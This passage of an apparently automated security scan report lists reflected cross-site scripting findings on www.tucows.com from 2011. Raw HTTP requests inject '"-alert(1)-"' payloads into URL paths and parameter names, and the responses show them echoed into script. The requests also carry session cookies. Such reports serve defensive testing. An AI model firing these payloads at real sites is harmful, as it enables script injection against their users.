X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.57. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d685f"-alert(1)-"468f4a77932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.58. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5e35"-alert(1)-"277a1eb2d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.59. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b699"-alert(1)-"96b8d0b02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.60. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5207"-alert(1)-"8d2e3d0b84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.61. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3505f"-alert(1)-"50098cc31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.62. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c7b"-alert(1)-"983752aa4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.63. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dce"-alert(1)-"df3be201d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.64. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53589"-alert(1)-"260f69e5fea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.65. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d6bc"-alert(1)-"8adb3574f02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.66. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 772af"-alert(1)-"9c97d81b22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.67. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e824"-alert(1)-"ef3735f6727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
